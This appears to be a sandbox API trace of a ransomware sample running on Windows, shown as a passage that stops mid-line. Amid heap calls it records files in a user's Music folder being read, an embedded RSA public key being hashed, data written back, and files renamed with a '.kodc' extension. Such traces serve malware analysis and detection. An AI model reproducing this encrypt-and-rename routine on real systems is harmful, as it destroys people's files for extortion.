[0101.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0101.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb81d8 [0101.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0101.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb81c0 [0101.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0101.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0101.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0101.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81d8 | out: hHeap=0x630000) returned 1 [0101.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81c0 | out: hHeap=0x630000) returned 1 [0101.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.850] GetCurrentThreadId () returned 0x42c [0101.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba8a58 [0101.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.851] GetCurrentThreadId () returned 0x42c [0101.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81c0 [0101.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0101.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81d8 [0101.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81a8 [0101.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb81f0 [0101.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a28 [0101.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0101.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81c0 | out: hHeap=0x630000) returned 1 [0101.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81c0 [0101.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0101.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0101.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0101.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0101.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0101.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81c0 | out: hHeap=0x630000) returned 1 [0101.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81f0 | out: hHeap=0x630000) returned 1 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81d8 | out: hHeap=0x630000) returned 1 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81a8 | out: hHeap=0x630000) returned 1 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0101.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8190 | out: hHeap=0x630000) returned 1 [0101.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb64c0 | out: hHeap=0x630000) returned 1 [0101.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0101.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0101.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0101.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0101.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0101.855] WriteFile (in: hFile=0x5cc, lpBuffer=0x9bb8968*, nNumberOfBytesToWrite=0x114d0, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9bb8968*, lpNumberOfBytesWritten=0x9e2fb14*=0x114d0, lpOverlapped=0x0) returned 1 [0101.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8968 | out: hHeap=0x630000) returned 1 [0101.855] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x114d5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.855] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.856] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0101.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0101.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0101.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0101.856] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.856] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0101.856] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0101.856] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.856] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.856] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.856] CloseHandle (hObject=0x5cc) returned 1 [0101.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0101.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0101.858] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\28dTIfQ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\28dtifq.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\28dTIfQ.m4a.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\28dtifq.m4a.kodc")) returned 1 [0101.859] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0101.859] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.859] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0101.861] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75052dc0, ftCreationTime.dwHighDateTime=0x1d5be5c, ftLastAccessTime.dwLowDateTime=0xb786e350, ftLastAccessTime.dwHighDateTime=0x1d5b9d9, ftLastWriteTime.dwLowDateTime=0xb786e350, ftLastWriteTime.dwHighDateTime=0x1d5b9d9, nFileSizeHigh=0x0, nFileSizeLow=0x6c1b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3nhftNJqbGrzTJO.m4a", cAlternateFileName="3NHFTN~1.M4A")) returned 1 [0101.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.861] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0101.861] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.861] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\3nhftNJqbGrzTJO.m4a") returned=".m4a" [0101.861] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\3nhftNJqbGrzTJO.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\3nhftnjqbgrztjo.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.861] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=27675) returned 1 [0101.861] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.865] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x6bf5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.865] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.866] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.866] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x6c1b, lpOverlapped=0x0) returned 1 [0101.866] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.866] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.866] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.867] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.868] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.868] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.868] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.868] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.868] GetLastError () returned 0x0 [0101.868] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.868] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.868] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.868] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.868] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x6c20) returned 0x9ba8d90 [0101.868] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb64c0 [0101.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8190 [0101.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6508 [0101.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81a8 [0101.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) 